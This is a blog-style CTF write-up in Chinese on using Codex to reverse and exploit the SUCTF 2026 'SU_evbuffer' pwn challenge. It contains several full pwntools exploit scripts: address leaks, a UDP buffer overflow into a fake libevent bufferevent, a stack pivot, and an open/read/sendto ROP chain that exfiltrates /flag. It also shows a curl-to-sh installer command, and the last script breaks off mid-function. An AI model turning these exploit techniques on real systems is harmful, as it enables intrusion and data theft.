llm for security 1: suctf 2026: SU_evbuffer

2026-04-15

1. 前言

LLM对于各行各业都带来了提升,ctf也不例外;但是llm究竟能对ctf,或者对安全提升的边界在哪里?llm是否会直接淘汰安全研究人员?新时代安全研究员如何利用llm提高自身能力且保证自己的不可替代性?要想回答这些问题,还是需要实践一下,分析llm现在的安全能力到底如何。

2. LLM选型: Codex

没有其他原因,只是因为codex允许我用,antigravity和claude都把我否了。

2.1 codex配置ida mcp

https://github.com/mrexodia/ida-pro-mcp
也可以参考IDAPro–MCP详细配置教程
保护全开。

3. SUCTF 2026:evbuffer

以一道题目为例,探索一下codex对于pwn题的能力分析:

3.1 安全保护机制

3.2 在已有题目环境基础下,给出docker pwn调试教程

https://pwndbg.re/stable/setup/#portable-release
下给出了一键式安装的步骤,仅需要在dockerfile中添加如下内容:

RUN apt-get install -y lib32z1 libevent-2.1-7 libseccomp2 git gdb curl xz-utils
RUN curl --proto '=https' --tlsv1.2 -LsSf 'https://install.pwndbg.re' | sh -s -- -t pwndbg-gdb

启动容器时,记得添加ptrace权限:

docker run --cap-add=SYS_PTRACE -d -p "0.0.0.0:8888:8888" -p "0.0.0.0:8889:8889/udp" -h "pwn" --name="pwn" --restart always suctf_evbuffer:pwn1

docker exec -u 0 -it IMAGE_ID bash

3.3 codex分析

我给codex下了如下命令:

使用ida的mcp功能,分析该二进制文件,梳理程序执行逻辑,找到漏洞,并写出exp脚本

codex返回的结果如下:

首先,codex只执行了前半部分,分析二进制文件梳理逻辑并找到漏洞,并没有给出exp脚本
另外没有人工先验知识的情况下,要分析AI说的是对是错太困难了,我给它下了另一个指令:

根据你的结论,对一些sub_xxx函数重新命名

把.bss段的全局对象也重命名,并添加注释

分析完后,可以得到codex分析的先验知识:
这是一个接受tcp/udp报文并处理的程序,使用的是lib_event库。

3.3.1 POC

我希望ai能够做出这道题目,于是给他下了其他命令:

现在这个环境可以访问,ip地址为127.0.0.1:8888和127.0.0.1:8889,请写出你的poc

实测POC是能触发程序崩溃的。

3.3.2 更进一步:exp

地址泄露是正常的,但是代码其实写的并不友好,不方便定位错误:

#!/usr/bin/env python3
from pwn import *


context.binary = ELF("./pwn", checksec=False)
elf = context.binary
libc = ELF("./libc.so.6", checksec=False)

context.arch = elf.arch
context.os = elf.os
context.log_level = args.LOG_LEVEL or "info"

HOST = "127.0.0.1"
PORT_TCP = int(args.TCP_PORT or 8888)
PORT_UDP = int(args.UDP_PORT or 8889)
FILE_PATH = (args.PATH or "/flag").encode() + b"\x00"
READ_FD = int(args.READ_FD or 9)
UDP_FD = int(args.UDP_FD or 6)

# Leak/layout offsets recovered from the target binary and verified in gdb.
LIBEVENT_LEAK_OFF = 0x137D8
GLOBAL_EVENT_BASE_DELTA = 0x8B0
STACK_BUF_DELTA = 0x3D0
PIE_LEAK_RET_OFF = 0x1619
CALL_SENDTO_OFF = 0x154A

# The challenge environment appears to keep libc at a fixed offset from libevent.
# The provided VM/docker layout uses 0x249000; some other local setups use 0x367000.
LIBC_FROM_LIBEVENT = int(args.LIBC_DELTA or 0x249000)


def start_tcp():
    return remote(HOST, PORT_TCP, typ="tcp")


def start_udp():
    return remote(HOST, PORT_UDP, typ="udp")


def choose_heap_candidate(leak: bytes) -> int:
    candidates = [u64(leak[0x28:0x30]), u64(leak[0x30:0x38])]
    userland = [x for x in candidates if 0x100000000000 <= x < 0x800000000000]
    if userland:
        chosen = max(userland)
        log.info("heap candidates = %s, chosen = %#x", [hex(x) for x in candidates], chosen)
        return chosen
    chosen = candidates[-1]
    log.warning("heap leak looked odd, falling back to %#x", chosen)
    return chosen


def leak_state():
    ip = b"0.0.0.0\x00"

    io_tcp = start_tcp()
    io_tcp.send(ip)
    leak_tcp = io_tcp.recvn(0x50)

    leaked_libevent = u64(leak_tcp[0x18:0x20])
    leaked_heap = choose_heap_candidate(leak_tcp)
    libevent_base = leaked_libevent - LIBEVENT_LEAK_OFF
    libc_base = libevent_base - LIBC_FROM_LIBEVENT
    global_event_base = leaked_heap - GLOBAL_EVENT_BASE_DELTA

    log.info("leaked_libevent = %#x", leaked_libevent)
    log.info("libevent_base    = %#x", libevent_base)
    log.info("libc_base        = %#x", libc_base)
    log.info("global_event_base= %#x", global_event_base)

    io_udp = start_udp()
    io_udp.send(ip)
    leak_udp = io_udp.recvn(0x50)

    leaked_stack = u64(leak_udp[0x40:0x48])
    leaked_pie = u64(leak_udp[0x48:0x50])
    pie_base = leaked_pie - PIE_LEAK_RET_OFF
    stack_buf = leaked_stack - STACK_BUF_DELTA

    log.info("leaked_stack     = %#x", leaked_stack)
    log.info("stack_buf        = %#x", stack_buf)
    log.info("pie_base         = %#x", pie_base)

    return {
        "ip": ip,
        "io_tcp": io_tcp,
        "io_udp": io_udp,
        "libc_base": libc_base,
        "pie_base": pie_base,
        "stack_buf": stack_buf,
        "global_event_base": global_event_base,
    }


def build_rop(libc_base: int, pie_base: int, stack_buf: int) -> bytes:
    rop = ROP(libc)
    pop_rdi = libc_base + rop.find_gadget(["pop rdi", "ret"]).address
    pop_rsi = libc_base + rop.find_gadget(["pop rsi", "ret"]).address
    pop_rax = libc_base + rop.find_gadget(["pop rax", "ret"]).address
    pop_rdx_rbp_r12 = libc_base + rop.find_gadget(["pop rdx", "pop rbp", "pop r12", "ret"]).address

    open_addr = libc_base + libc.sym["open"]
    read_addr = libc_base + libc.sym["read"]
    mov_rsp_rdx = libc_base + next(libc.search(b"\x48\x89\xd4\xc3"))
    call_sendto = pie_base + CALL_SENDTO_OFF

    fake_bev_addr = stack_buf + 0x80
    rop_addr = fake_bev_addr + 0x120

    chain = flat(
        pop_rdi,
        stack_buf + 0x10,   # "/flag"
        pop_rsi,
        0,
        open_addr,
        pop_rdi,
        READ_FD,            # open() return value in the provided env
        pop_rsi,
        stack_buf + 0x18,
        pop_rdx_rbp_r12,
        0x100,
        0,
        0,
        read_addr,
        pop_rdx_rbp_r12,
        stack_buf - 0x10,   # saved UDP sockaddr on udp_read_cb stack
        0,
        0,
        pop_rax,
        UDP_FD,             # UDP socket fd in the provided env
        pop_rsi,
        stack_buf + 0x18,
        call_sendto,
    )

    return chain, fake_bev_addr, mov_rsp_rdx


def build_fake_bufferevent(fake_bev_addr: int, mov_rsp_rdx: int) -> bytes:
    fake_callbacks_addr = fake_bev_addr + 0x80
    rop_addr = fake_bev_addr + 0x120

    fake = flat(
        0,                      # evbuffer.first
        0,                      # evbuffer.last
        fake_bev_addr,          # evbuffer.last_with_datap -> self
        rop_addr - 0x50,        # gets carried into rdx before cb call
        rop_addr - 0x50,        # scratch field used on the same path
        fake_bev_addr,          # scratch/self
    )
    fake = fake.ljust(0x78, b"\x00")

    # evbuffer.callbacks LIST_HEAD + inline fake evbuffer_cb_entry.
    fake += flat(
        fake_callbacks_addr,    # callbacks.lh_first
        0,                      # entry.next.le_next
        0,                      # entry.next.le_prev
        mov_rsp_rdx,            # entry.cb.cb_func
        0,                      # entry.cbarg
        0x40001,                # entry.flags
        0,
    )
    fake = fake.ljust(0x118, b"\x00")
    fake += p64(fake_bev_addr)  # fake bufferevent.output
    return fake


def build_payload(ip: bytes, stack_buf: int, global_event_base: int, fake_bev_addr: int, fake_bev: bytes, rop_chain: bytes) -> bytes:
    payload = ip.ljust(0x10, b"\x00")
    payload += FILE_PATH
    payload = payload.ljust(0x58, b"\x00")

    # Overwrite tcp_io_ctx_{use_bev, bev, fd} and global_event_base.
    payload += flat(
        1,
        fake_bev_addr,
        0,
        global_event_base,
    )
    payload = payload.ljust(0x80, b"\x00")
    payload += fake_bev
    payload += rop_chain
    return payload


def exploit():
    state = leak_state()
    rop_chain, fake_bev_addr, mov_rsp_rdx = build_rop(
        state["libc_base"], state["pie_base"], state["stack_buf"]
    )
    fake_bev = build_fake_bufferevent(fake_bev_addr, mov_rsp_rdx)
    payload = build_payload(
        state["ip"],
        state["stack_buf"],
        state["global_event_base"],
        fake_bev_addr,
        fake_bev,
        rop_chain,
    )

    log.info("fake_bev_addr    = %#x", fake_bev_addr)
    log.info("mov_rsp_rdx      = %#x", mov_rsp_rdx)
    log.info("payload_len      = %#x", len(payload))
    log.info("FILE_PATH        = %r", FILE_PATH)
    log.info("READ_FD / UDP_FD = %d / %d", READ_FD, UDP_FD)

    if args.PAUSE:
        pause()

    state["io_udp"].send(payload)
    state["io_tcp"].send(state["ip"])

    data = state["io_udp"].recv(timeout=2)
    if data:
        log.success("received %d bytes back over UDP", len(data))
        print(data)
    else:
        log.warning("no immediate UDP response; switching to interactive mode")

    state["io_udp"].interactive()


if __name__ == "__main__":
    exploit()

重新发送指令:

请更改代码,添加注释,使其更易阅读和理解。

#!/usr/bin/env python3
from pwn import *


# This exploit uses the bug in handle_ip_request():
#   1. trigger normal TCP/UDP replies to leak runtime addresses;
#   2. place a fake bufferevent/evbuffer on the UDP callback stack;
#   3. overwrite tcp_io_ctx so the next TCP request uses our fake object;
#   4. pivot into a ROP chain that performs open/read/sendto.

context.binary = ELF("./pwn", checksec=False)
elf = context.binary
libc = ELF("./libc.so.6", checksec=False)

context.arch = elf.arch
context.os = elf.os
context.log_level = args.LOG_LEVEL or "info"

HOST = args.HOST or "192.168.62.130"
PORT_TCP = int(args.TCP_PORT or 8888)
PORT_UDP = int(args.UDP_PORT or 8889)
FILE_PATH = (args.PATH or "/flag").encode() + b"\x00"
READ_FD = int(args.READ_FD or 9)
UDP_FD = int(args.UDP_FD or 6)

# Layout/constants recovered from reversing the main binary and confirmed in gdb.
LIBEVENT_LEAK_OFF = 0x137D8
GLOBAL_EVENT_BASE_DELTA = 0x8B0
STACK_BUF_DELTA = 0x3D0
PIE_LEAK_RET_OFF = 0x1619
CALL_SENDTO_OFF = 0x154A

# The challenge environment appears to keep libc at a fixed offset from libevent.
# The provided VM/docker layout uses 0x249000; some other local setups use 0x367000.
LIBC_FROM_LIBEVENT = int(args.LIBC_DELTA or 0x249000)

# Offsets inside the UDP overflow region. The UDP path writes into udp_io_ctx at 0x4040
# and overflows forward into tcp_io_ctx at 0x4078.
OVERFLOW_TO_TCP_CTX = 0x38
OVERFLOW_TO_TCP_USE_BEV = OVERFLOW_TO_TCP_CTX + 0x20

# Offsets inside struct bufferevent / evbuffer used by the fake object.
FAKE_BEV_OUTPUT_OFF = 0x118
FAKE_EVB_CALLBACKS_OFF = 0x78


def build_ip_request_blob() -> bytes:
    # The service first runs inet_pton() on the input, so every trigger packet
    # must begin with a valid IPv4 string followed by a NUL terminator.
    return b"0.0.0.0\x00"


def start_tcp():
    return remote(HOST, PORT_TCP, typ="tcp")


def start_udp():
    return remote(HOST, PORT_UDP, typ="udp")


def choose_heap_candidate(leak: bytes) -> int:
    # Different environments may place a useful heap pointer at slightly different
    # offsets inside the 0x50-byte hostname reply. Keep both known candidates and
    # pick the one that looks like a canonical userland address.
    candidates = [u64(leak[0x28:0x30]), u64(leak[0x30:0x38])]
    userland = [x for x in candidates if 0x100000000000 <= x < 0x800000000000]
    if userland:
        chosen = max(userland)
        log.info("heap candidates = %s, chosen = %#x", [hex(x) for x in candidates], chosen)
        return chosen
    chosen = candidates[-1]
    log.warning("heap leak looked odd, falling back to %#x", chosen)
    return chosen


def leak_state():
    ip = build_ip_request_blob()

    # Stage 1a: use the legitimate TCP response path to leak libevent/heap pointers.
    io_tcp = start_tcp()
    io_tcp.send(ip)
    leak_tcp = io_tcp.recvn(0x50)

    leaked_libevent = u64(leak_tcp[0x18:0x20])
    leaked_heap = choose_heap_candidate(leak_tcp)
    libevent_base = leaked_libevent - LIBEVENT_LEAK_OFF
    libc_base = libevent_base - LIBC_FROM_LIBEVENT
    global_event_base = leaked_heap - GLOBAL_EVENT_BASE_DELTA

    log.info("leaked_libevent = %#x", leaked_libevent)
    log.info("libevent_base    = %#x", libevent_base)
    log.info("libc_base        = %#x", libc_base)
    log.info("global_event_base= %#x", global_event_base)

    # Stage 1b: use the legitimate UDP response path to leak a stack pointer and
    # a PIE return address from udp_read_cb().
    io_udp = start_udp()
    io_udp.send(ip)
    leak_udp = io_udp.recvn(0x50)

    leaked_stack = u64(leak_udp[0x40:0x48])
    leaked_pie = u64(leak_udp[0x48:0x50])
    pie_base = leaked_pie - PIE_LEAK_RET_OFF
    stack_buf = leaked_stack - STACK_BUF_DELTA

    log.info("leaked_stack     = %#x", leaked_stack)
    log.info("stack_buf        = %#x", stack_buf)
    log.info("pie_base         = %#x", pie_base)

    return {
        "ip": ip,
        "io_tcp": io_tcp,
        "io_udp": io_udp,
        "libc_base": libc_base,
        "pie_base": pie_base,
        "stack_buf": stack_buf,
        "global_event_base": global_event_base,
    }


def build_rop(libc_base: int, pie_base: int, stack_buf: int):
    # The final ROP chain lives on the UDP callback stack, right after the fake
    # bufferevent object. A fake evbuffer callback pivots rsp into this chain.
    rop = ROP(libc)
    pop_rdi = libc_base + rop.find_gadget(["pop rdi", "ret"]).address
    pop_rsi = libc_base + rop.find_gadget(["pop rsi", "ret"]).address
    pop_rax = libc_base + rop.find_gadget(["pop rax", "ret"]).address
    pop_rdx_rbp_r12 = libc_base + rop.find_gadget(["pop rdx", "pop rbp", "pop r12", "ret"]).address

    open_addr = libc_base + libc.sym["open"]
    read_addr = libc_base + libc.sym["read"]
    mov_rsp_rdx = libc_base + next(libc.search(b"\x48\x89\xd4\xc3"))
    call_sendto = pie_base + CALL_SENDTO_OFF

    # The fake object is placed inside the overflown UDP stack buffer.
    fake_bev_addr = stack_buf + 0x80
    rop_addr = fake_bev_addr + FAKE_BEV_OUTPUT_OFF + 8

    chain = flat(
        pop_rdi,
        stack_buf + 0x10,   # FILE_PATH copied into the start of the UDP buffer
        pop_rsi,
        0,
        open_addr,
        pop_rdi,
        READ_FD,            # expected fd returned by open() in this environment
        pop_rsi,
        stack_buf + 0x18,
        pop_rdx_rbp_r12,
        0x100,
        0,
        0,
        read_addr,
        pop_rdx_rbp_r12,
        stack_buf - 0x10,   # sockaddr saved by recvfrom() in udp_read_cb()
        0,
        0,
        pop_rax,
        UDP_FD,             # UDP socket fd in the provided env
        pop_rsi,
        stack_buf + 0x18,
        call_sendto,
    )

    return chain, fake_bev_addr, mov_rsp_rdx


def build_fake_bufferevent(fake_bev_addr: int, mov_rsp_rdx: int) -> bytes:
    # fake_bev doubles as a fake evbuffer because bufferevent_get_output()
    # returns bev->output, and handle_ip_request() immediately passes that
    # pointer into evbuffer_add_reference().
    fake_callbacks_addr = fake_bev_addr + FAKE_EVB_CALLBACKS_OFF
    rop_addr = fake_bev_addr + FAKE_BEV_OUTPUT_OFF + 8

    fake = flat(
        0,                      # evbuffer.first
        0,                      # evbuffer.last
        fake_bev_addr,          # evbuffer.last_with_datap -> self
        rop_addr - 0x50,        # later propagated into rdx before the callback
        rop_addr - 0x50,        # scratch field touched on the same path
        fake_bev_addr,          # scratch/self
    )
    fake = fake.ljust(FAKE_EVB_CALLBACKS_OFF, b"\x00")

    # Fake evbuffer.callbacks LIST_HEAD + one inline evbuffer_cb_entry.
    # The callback body is a tiny gadget: mov rsp, rdx ; ret.
    fake += flat(
        fake_callbacks_addr,    # callbacks.lh_first
        0,                      # entry.next.le_next
        0,                      # entry.next.le_prev
        mov_rsp_rdx,            # entry.cb.cb_func
        0,                      # entry.cbarg
        0x40001,                # entry.flags
        0,
    )
    fake = fake.ljust(FAKE_BEV_OUTPUT_OFF, b"\x00")
    fake += p64(fake_bev_addr)  # fake bufferevent.output -> fake evbuffer
    return fake


def build_payload(
    ip: bytes,
    stack_buf: int,
    global_event_base: int,
    fake_bev_addr: int,
    fake_bev: bytes,
    rop_chain: bytes,
) -> bytes:
    # The payload is copied by the UDP path into udp_io_ctx and then continues
    # overflowing forward into tcp_io_ctx. The same bytes also remain on the UDP
    # stack, which is why we can later pivot into the fake object/ROP chain.
    payload = ip.ljust(0x10, b"\x00")
    payload += FILE_PATH
    payload = payload.ljust(OVERFLOW_TO_TCP_USE_BEV, b"\x00")

    # Overwrite:
    #   tcp_io_ctx_use_bev -> 1, so the next TCP request goes through bev->output;
    #   tcp_io_ctx_bev     -> fake_bev on the UDP stack;
    #   tcp_io_ctx_fd      -> unused here;
    #   global_event_base  -> preserved to avoid destabilizing libevent.
    payload += flat(
        1,
        fake_bev_addr,
        0,
        global_event_base,
    )
    payload = payload.ljust(0x80, b"\x00")
    payload += fake_bev
    payload += rop_chain
    return payload


def exploit():
    # Stage 1: gather the addresses needed to place the fake object and ROP chain.
    state = leak_state()

    # Stage 2: build the fake libevent object and the ORW/sendto ROP chain.
    rop_chain, fake_bev_addr, mov_rsp_rdx = build_rop(
        state["libc_base"], state["pie_base"], state["stack_buf"]
    )
    fake_bev = build_fake_bufferevent(fake_bev_addr, mov_rsp_rdx)
    payload = build_payload(
        state["ip"],
        state["stack_buf"],
        state["global_event_base"],
        fake_bev_addr,
        fake_bev,
        rop_chain,
    )

    log.info("fake_bev_addr    = %#x", fake_bev_addr)
    log.info("mov_rsp_rdx      = %#x", mov_rsp_rdx)
    log.info("payload_len      = %#x", len(payload))
    log.info("FILE_PATH        = %r", FILE_PATH)
    log.info("READ_FD / UDP_FD = %d / %d", READ_FD, UDP_FD)

    if args.PAUSE:
        pause()

    # Stage 3: send the UDP overflow first, then a short TCP request to consume
    # tcp_io_ctx_bev and drive execution into bufferevent_get_output(fake_bev).
    state["io_udp"].send(payload)
    state["io_tcp"].send(state["ip"])

    data = state["io_udp"].recv(timeout=2)
    if data:
        log.success("received %d bytes back over UDP", len(data))
        print(data)
    else:
        log.warning("no immediate UDP response; switching to interactive mode")

    state["io_udp"].interactive()


if __name__ == "__main__":
    exploit()

写出的代码易读了很多,方便我们做修改
现在开始debug吧,原本是想自己先写一版人工脚本,但是转念一想,以后肯定是ai+人来打比赛和学习了,在ai的基础上修改是必要技能,遂放弃人工的想法。
利用后发现程序没有回显,这倒是正常,重点在于如何调试发现问题,并解决。

3.3.3 exp调试

调试需要按照codex给出完整思路,并按照思路编排代码,这样是方便调试的(否则一时间也很难看懂问题发生在哪里:
首先是重新生成一份代码,payload是按利用顺序来构造的
修改后的payload构造如下:
后续调试只需要改payload发就行:

#!/usr/bin/env python3
import socket

from pwn import *


context.binary = ELF("./pwn", checksec=False)
libc = ELF("./libc.so.6", checksec=False)
context.arch = "amd64"
context.os = "linux"
context.log_level = args.LOG_LEVEL or "info"

HOST = args.HOST or "192.168.62.130"
TCP_PORT = int(args.TCP_PORT or 8888)
UDP_PORT = int(args.UDP_PORT or 8889)
FILE_PATH = (args.PATH or "/flag").encode() + b"\x00"
READ_FD = int(args.READ_FD or 9)
UDP_FD = int(args.UDP_FD or 6)

# Offsets confirmed during reversing / debugging.
LIBEVENT_LEAK_OFF = 0x137D8
GLOBAL_EVENT_BASE_DELTA = 0x8B0
PIE_LEAK_RET_OFF = 0x1619
LIBC_FROM_LIBEVENT = int(args.LIBC_DELTA or 0x249000)
CALL_SENDTO_OFF = 0x154A

UDP_IO_CTX_OFF = 0x4040
OVERFLOW_TO_TCP_USE_BEV = 0x58
BSS_FAKE_BEV_OFF = 0x40C0
BSS_PATH_OFF = 0x41F0
BSS_READ_BUF_OFF = 0x4200
BSS_SOCKADDR_OFF = 0x4300
BSS_ROP_OFF = 0x4320
FAKE_EVB_CALLBACKS_OFF = 0x78
FAKE_BEV_OUTPUT_OFF = 0x118


def request_blob() -> bytes:
    return b"0.0.0.0\x00"


def choose_heap_candidate(reply: bytes) -> int:
    candidates = [u64(reply[0x28:0x30]), u64(reply[0x30:0x38])]
    userland = [x for x in candidates if 0x100000000000 <= x < 0x800000000000]
    return max(userland) if userland else candidates[-1]


def open_channels():
    tcp = remote(HOST, TCP_PORT, typ="tcp")
    udp = remote(HOST, UDP_PORT, typ="udp")
    return tcp, udp


def leak_all(tcp, udp):
    blob = request_blob()
    leaks = {}

    tcp.send(blob)
    reply = tcp.recvn(0x50)
    leaked_libevent = u64(reply[0x18:0x20])
    leaked_heap = choose_heap_candidate(reply)
    libevent_base = leaked_libevent - LIBEVENT_LEAK_OFF

    leaks["tcp_reply"] = reply
    leaks["leaked_libevent"] = leaked_libevent
    leaks["libevent_base"] = libevent_base
    leaks["libc_base"] = libevent_base - LIBC_FROM_LIBEVENT
    leaks["leaked_heap"] = leaked_heap
    leaks["global_event_base"] = leaked_heap - GLOBAL_EVENT_BASE_DELTA

    udp.send(blob)
    reply = udp.recvn(0x50)
    leaked_stack = u64(reply[0x40:0x48])
    leaked_pie = u64(reply[0x48:0x50])

    leaks["udp_reply"] = reply
    leaks["leaked_stack"] = leaked_stack
    leaks["leaked_pie_ret"] = leaked_pie
    leaks["pie_base"] = leaked_pie - PIE_LEAK_RET_OFF
    leaks["udp_peer"] = udp.sock.getsockname()

    return leaks


def build_payload(leaks):
    pie_base = leaks["pie_base"]
    libc_base = leaks["libc_base"]

    fake_bev_addr = pie_base + BSS_FAKE_BEV_OFF
    path_addr = pie_base + BSS_PATH_OFF
    read_buf_addr = pie_base + BSS_READ_BUF_OFF
    sockaddr_addr = pie_base + BSS_SOCKADDR_OFF
    rop_addr = pie_base + BSS_ROP_OFF

    rop = ROP(libc)

    pop_rdi_g = sorted(
        [
            g
            for g in rop.gadgets.values()
            if g.insns
            and g.insns[-1] == "ret"
            and g.insns[0] == "pop rdi"
            and all(insn.startswith("pop ") for insn in g.insns[:-1])
        ],
        key=lambda g: len(g.insns),
    )[0]
    pop_rsi_g = sorted(
        [
            g
            for g in rop.gadgets.values()
            if g.insns
            and g.insns[-1] == "ret"
            and g.insns[0] == "pop rsi"
            and all(insn.startswith("pop ") for insn in g.insns[:-1])
        ],
        key=lambda g: len(g.insns),
    )[0]
    pop_rax_g = sorted(
        [
            g
            for g in rop.gadgets.values()
            if g.insns
            and g.insns[-1] == "ret"
            and g.insns[0] == "pop rax"
            and all(insn.startswith("pop ") for insn in g.insns[:-1])
        ],
        key=lambda g: len(g.insns),
    )[0]
    pop_rdx_g = sorted(
        [
            g
            for g in rop.gadgets.values()
            if g.insns
            and g.insns[-1] == "ret"
            and g.insns[0] == "pop rdx"
            and all(insn.startswith("pop ") for insn in g.insns[:-1])
        ],
        key=lambda g: len(g.insns),
    )[0]

    pop_rdi = libc_base + pop_rdi_g.address
    pop_rsi = libc_base + pop_rsi_g.address
    pop_rax = libc_base + pop_rax_g.address
    pop_rdx = libc_base + pop_rdx_g.address
    pad_rdi = b"".join(p64(0) for _ in pop_rdi_g.insns[1:-1])
    pad_rsi = b"".join(p64(0) for _ in pop_rsi_g.insns[1:-1])
    pad_rax = b"".join(p64(0) for _ in pop_rax_g.insns[1:-1])
    pad_rdx = b"".join(p64(0) for _ in pop_rdx_g.insns[1:-1])

    open_addr = libc_base + libc.sym["open"]
    read_addr = libc_base + libc.sym["read"]
    mov_rsp_rdx = libc_base + next(libc.search(b"\x48\x89\xd4\xc3"))
    call_sendto = pie_base + CALL_SENDTO_OFF

    fake_evbuffer = b""
    fake_evbuffer += p64(0)
    fake_evbuffer += p64(0)
    fake_evbuffer += p64(fake_bev_addr)
    fake_evbuffer += p64(0)
    fake_evbuffer += p64(0)
    fake_evbuffer += p64(0)
    fake_evbuffer += p64(0)
    fake_evbuffer += p64(0)
    fake_evbuffer = fake_evbuffer.ljust(FAKE_EVB_CALLBACKS_OFF, b"\x00")
    fake_evbuffer += p64(fake_bev_addr + FAKE_EVB_CALLBACKS_OFF)
    fake_evbuffer += p64(0)
    fake_evbuffer += p64(0)
    fake_evbuffer += p64(mov_rsp_rdx)
    fake_evbuffer += p64(rop_addr)
    fake_evbuffer += p64(1)
    fake_evbuffer += p64(0)
    fake_evbuffer = fake_evbuffer.ljust(FAKE_BEV_OUTPUT_OFF, b"\x00")
    fake_evbuffer += p64(fake_bev_addr)

    rop_region = b""
    rop_region += FILE_PATH
    rop_region = rop_region.ljust(BSS_SOCKADDR_OFF - BSS_PATH_OFF, b"\x00")
    rop_region += p16(socket.AF_INET)
    rop_region += p16(leaks["udp_peer"][1], endian="big")
    rop_region += socket.inet_aton(leaks["udp_peer"][0])
    rop_region += b"\x00" * 8
    rop_region = rop_region.ljust(BSS_ROP_OFF - BSS_PATH_OFF, b"\x00")
    rop_region += p64(pop_rdi) + p64(path_addr) + pad_rdi
    rop_region += p64(pop_rsi) + p64(0) + pad_rsi
    rop_region += p64(open_addr)
    rop_region += p64(pop_rdi) + p64(READ_FD) + pad_rdi
    rop_region += p64(pop_rsi) + p64(read_buf_addr) + pad_rsi
    rop_region += p64(pop_rdx) + p64(0x100) + pad_rdx
    rop_region += p64(read_addr)
    rop_region += p64(pop_rdx) + p64(sockaddr_addr) + pad_rdx
    rop_region += p64(pop_rax) + p64(UDP_FD) + pad_rax
    rop_region += p64(pop_rsi) + p64(read_buf_addr) + pad_rsi
    rop_region += p64(call_sendto)

    payload = b""
    payload += request_blob() # ip 4byte
    payload = payload.ljust(OVERFLOW_TO_TCP_USE_BEV, b"\x00") # 84byte
    payload += p64(1) # tcp_io_ctx_use_bev = 1
    payload += p64(fake_bev_addr)  # tcp_io_ctx_bev = fake_bev_addr  0x40c0+base
    payload += p64(0)   # tcp fd = 0
    payload += p64(leaks["global_event_base"]) # global_event_base = global_event_base
    payload = payload.ljust(BSS_FAKE_BEV_OFF - UDP_IO_CTX_OFF, b"\x00") # fill to 0x40c0
    # fake bev:
    output_addr = pie_base+0x41e0
    fake_cb = output_addr + 0x80
    pivot_stack = output_addr + 0xB0
    payload += cyclic(280)   # 0x40c0 payload
    payload += p64(output_addr) # output_addr
    #---output construction:0x41e0 payload : evbuffer
    # 0x41e0: fake evbuffer.  This is enough for
    # evbuffer_add_reference() -> evbuffer_invoke_callbacks_() -> sub_EF40()
    # to call fake_cb->cb_func(output, &info, fake_cb->cbarg).
    payload += p64(0)            # +0x00 first
    payload += p64(0)            # +0x08 last
    payload += p64(output_addr)  # +0x10 last_with_datap = &first
    payload += p64(0)            # +0x18 total_len
    payload += p64(0)            # +0x20 n_add_for_cb
    payload += p64(0)            # +0x28 n_del_for_cb
    payload += p64(0)            # +0x30 lock
    payload += p64(0)            # +0x38 flags: no freeze, no deferred callback
    payload = payload.ljust((output_addr + 0x78) - (pie_base + UDP_IO_CTX_OFF), b"\x00")
    payload += p64(fake_cb)      # +0x78 callbacks.lh_first
    payload += p64(0)            # +0x80 cb_entry.next
    payload += p64(0)            # +0x88 cb_entry.prev
    payload += p64(mov_rsp_rdx)  # +0x90 cb_entry.cb_func
    payload += p64(pivot_stack)  # +0x98 cb_entry.cbarg -> rdx
    payload += p64(1)            # +0xa0 EVBUFFER_CB_ENABLED
    payload = payload.ljust((pivot_stack) - (pie_base + UDP_IO_CTX_OFF), b"\x00")
    payload += p64(0x4141414141414141)
    # payload = payload.ljust(BSS_PATH_OFF - UDP_IO_CTX_OFF, b"\x00")
    # payload += rop_region
    return payload


def main():
    tcp, udp = open_channels()
    try:
        leaks = leak_all(tcp, udp)
        for name, value in leaks.items():
            if isinstance(value, bytes):
                log.info("%s (%#x bytes)", name, len(value))
                print(hexdump(value))
            elif isinstance(value, tuple):
                log.success("%s = %s:%d", name, *value)
            else:
                log.success("%s = %#x", name, value)
        
        payload = build_payload(leaks)
        log.info("payload_len = %#x", len(payload))
        #print(hexdump(payload))
        udp.send(payload)
        tcp.send(b"0.0.0.0\x00")
        tcp.interactive()
    finally:
        if not args.INTERACTIVE:
            tcp.close()
            udp.close()
        


if __name__ == "__main__":
    main()

上述代码由chatgpt5.5修改+人为修改,ai真的是有点东西的,这回能够走到劫持程序控制流了:

3.3.4 最终调试版

在上述代码的基础上,让ai在后续补上orw的rop链,最终完成调用:

#!/usr/bin/env python3
import socket

from pwn import *


context.binary = ELF("./pwn", checksec=False)
libc = ELF("./libc.so.6", checksec=False)
context.arch = "amd64"
context.os = "linux"
context.log_level = args.LOG_LEVEL or "info"

HOST = args.HOST or "192.168.62.130"
TCP_PORT = int(args.TCP_PORT or 8888)
UDP_PORT = int(args.UDP_PORT or 8889)
FILE_PATH = (args.PATH or "/flag").encode() + b"\x00"
READ_FD = int(args.READ_FD or 9)
UDP_FD = int(args.UDP_FD or 6)
TCP_FD = int(args.TCP_FD or 8)

# Offsets confirmed during reversing / debugging.
LIBEVENT_LEAK_OFF = 0x137D8
GLOBAL_EVENT_BASE_DELTA = 0x8B0
PIE_LEAK_RET_OFF = 0x1619
LIBC_FROM_LIBEVENT = int(args.LIBC_DELTA or 0x249000)
CALL_SENDTO_OFF = 0x154A

UDP_IO_CTX_OFF = 0x4040
OVERFLOW_TO_TCP_USE_BEV = 0x58
BSS_FAKE_BEV_OFF = 0x40C0
BSS_PATH_OFF = 0x41F0
BSS_READ_BUF_OFF = 0x4200
BSS_SOCKADDR_OFF = 0x4300
BSS_ROP_OFF = 0x4320
FAKE_EVB_CALLBACKS_OFF = 0x78
FAKE_BEV_OUTPUT_OFF = 0x118


def request_blob() -> bytes:
    return b"0.0.0.0\x00"


def choose_heap_candidate(reply: bytes) -> int:
    candidates = [u64(reply[0x28:0x30]), u64(reply[0x30:0x38])]
    userland = [x for x in candidates if 0x100000000000 <= x < 0x800000000000]
    return max(userland) if userland else candidates[-1]


def open_channels():
    tcp = remote(HOST, TCP_PORT, typ="tcp")
    udp = remote(HOST, UDP_PORT, typ="udp")
    return tcp, udp


def leak_all(tcp, udp):
    blob = request_blob()
    leaks = {}

    tcp.send(blob)
    reply = tcp.recvn(0x50)
    leaked_libevent = u64(reply[0x18:0x20])
    leaked_heap = choose_heap_candidate(reply)
    libevent_base = leaked_libevent - LIBEVENT_LEAK_OFF

    leaks["tcp_reply"] = reply
    leaks["leaked_libevent"] = leaked_libevent
    leaks["libevent_base"] = libevent_base
    leaks["libc_base"] = libevent_base - LIBC_FROM_LIBEVENT
    leaks["leaked_heap"] = leaked_heap
